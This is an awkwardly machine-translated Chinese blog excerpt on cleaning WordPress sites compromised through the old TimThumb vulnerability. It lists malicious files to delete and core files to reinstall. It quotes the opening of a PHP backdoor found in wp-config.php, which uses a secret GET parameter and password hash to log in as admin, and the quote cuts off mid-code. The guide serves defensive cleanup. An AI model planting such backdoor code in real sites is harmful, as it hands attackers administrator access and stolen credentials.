如何修复和清理WordPress中的TimThumb Hack
所以如果你没有记错的话,8月份的TimThumb脚本存在安全问题。 然而,令我们惊讶的是,许多网站仍然使用旧版本。 在过去一个月里,我们已经确定了三个地点,一个是昨天。 因此,只需逐步撰写文章,这是有道理的,所以我们的用户可以随时关注它。 我们解决这个问题的所有三个用户甚至不知道TimThumb是什么,或者他们是否使用它。 TimThumb是一个调整图像大小的PHP脚本。 它有一个漏洞,但现在使用是安全的。 那么你怎么知道你的网站被黑了呢? 如果您在访问您的网站时在浏览器上看到红色大屏幕,请执行以下操作: 如果您开始受到关于用户从您的网站重定向的电子邮件轰炸。 最有可能的情况是,您的网站是这个漏洞的受害者。 作为一个谨慎的措施,每个人都应该使用这个Timthumb漏洞扫描器。 这会告诉你是否使用TimThumb的旧版本。 许多主题俱乐部立即升级了他们的核心。 所以这个插件会检查是否安装了Timthumb的新安全版本,或者安装了旧版本。 现在,如果你的网站已经陷入了这个Timthumb的攻击,那么这就是你需要做的。 首先你需要删除下列文件: /wp-admin/upd.php /wp-content/upd.php 登录WordPress管理面板并重新安装WordPress版本。 我们正在专门寻找重新安装这些文件: /wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js 然后打开你的 WP-config.php文件 在那里你很可能会发现这个大的恶意软件代码,正在收集登录凭据和cookie。 这段代码将会走向底部。 if(isset($ _ GET [‘pingnow’])&& isset($ _ GET [‘pass’])){ if($ _GET [‘pass’] ==’19ca14e7ea6328a42e0eb13d585e4c22’){ if($ _GET [‘pingnow’] ==’login’){ $ user_login =’admin’; $ user = get_userdatabylogin($ user_login); $ user_id = … Read more 如何修复和清理WordPress中的TimThumb Hack









